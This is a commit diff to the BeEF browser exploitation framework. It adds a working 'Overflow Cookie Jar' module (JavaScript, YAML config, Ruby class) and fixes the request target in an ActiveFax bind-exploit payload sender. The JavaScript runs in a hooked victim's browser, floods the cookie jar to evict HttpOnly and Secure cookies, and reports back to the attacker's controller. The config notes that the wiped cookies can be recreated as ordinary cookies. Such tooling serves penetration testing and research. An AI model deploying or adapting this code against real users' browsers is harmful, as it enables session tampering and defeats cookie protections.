Inital version of CookieJar overflow module. And minor bugfix of acti…

…ve fax overflow module.

modules/browser/hooked_domain/overflow_cookiejar/command.js

@@ -0,0 +1,79 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - [email protected]
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+   var preserveCookies = '<%= @preserveCookies %>'
+
+   var initialtimestamp;
+   var currenttimestamp;
+   var i = 0;
+   var preservedCookies;
+
+   function setCookie(cname,cvalue){
+      document.cookie = cname + "=" + cvalue;
+   }
+
+   function getCookie(cname){
+      var name = cname + "=";
+      var ca = document.cookie.split(';');
+
+      for(var i=0; i<ca.length; i++){
+         var c = ca[i].trim();
+         if (c.indexOf(name)==0) return c.substring(name.length,c.length);
+      }
+      return "";
+   }
+
+   function deleteAllCookies(){
+      var cookies = document.cookie.split(";");
+
+      if (cookies.length > 0){
+         var cookie = cookies[0];
+         var eqPos = cookie.indexOf("=");
+         var name = eqPos > -1 ? cookie.substr(0, eqPos) : cookie;
+
+         document.cookie = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT";
+         if (cookies.length > 1){
+            //Timeout needed because otherwise cookie write loop freezes render thread
+            setTimeout(deleteAllCookies,1);
+         }
+         else{
+            if (preserveCookies){
+               var pc = preservedCookies.split(';');
+
+               for(var i=0; i<pc.length; i++){
+                  var c = pc[i].trim();
+                  document.cookie = c;
+               }
+            }
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'Attempt to overflow the Cookie Jar completed');
+         }
+      }
+   }
+
+   function overflowCookie() {
+      if(getCookie(initialtimestamp) === "BeEF") {
+         currenttimestamp = Date.now();
+         setCookie(currenttimestamp,"BeEF");
+         //Timeout needed because otherwise cookie write loop freezes render thread
+         setTimeout(overflowCookie, 1);
+      }
+      else{
+         deleteAllCookies();
+      }
+   }
+
+   function overflowCookieJar(){
+      preservedCookies = document.cookie;
+      initialtimestamp = Date.now();
+      setCookie(initialtimestamp,"BeEF");
+      overflowCookie();
+   }
+
+   overflowCookieJar();
+
+});
+

modules/browser/hooked_domain/overflow_cookiejar/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - [email protected]
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        overflow_cookiejar:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Overflow Cookie Jar"
+            description: "This module attempts to perform John Wilander's CookieJar overflow.  He demonstrated this in his <a href='https://www.owasp.org/index.php/OWASP_1-Liner'>Owasp 1-liner project</a>.  With this module, cookies that have the HTTPOnly-flag and/or HTTPS-flag can be wiped.  You can try to recreate these cookies afterwards as normal cookies."
+            authors: ["Bart Leppens"]
+            target:
+                working: ["S","C","FF","IE"]

modules/browser/hooked_domain/overflow_cookiejar/module.rb

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - [email protected]
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Overflow_cookiejar < BeEF::Core::Command
+  def self.options
+     return [
+	{'name' => 'preserveCookies', 'type' => 'checkbox', 'ui_label' => 'Attempt to preserve all non-httpOnly cookies', 'checked' => 'true'}
+      ]
+  end
+  def post_execute
+     save({'result' => @datastore['result']})
+  end
+
+end

modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/command.js

@@ -35,7 +35,7 @@ sendpayload = function(payload, uri, timeout, logdata){
         this.send(ui8Data);
       };
     }
-    xhr.open("POST", url, true);
+    xhr.open("POST", uri, true);
     xhr.setRequestHeader("Content-Type", "text/plain");
     xhr.setRequestHeader('Accept','*/*');
     xhr.setRequestHeader("Accept-Language", "en");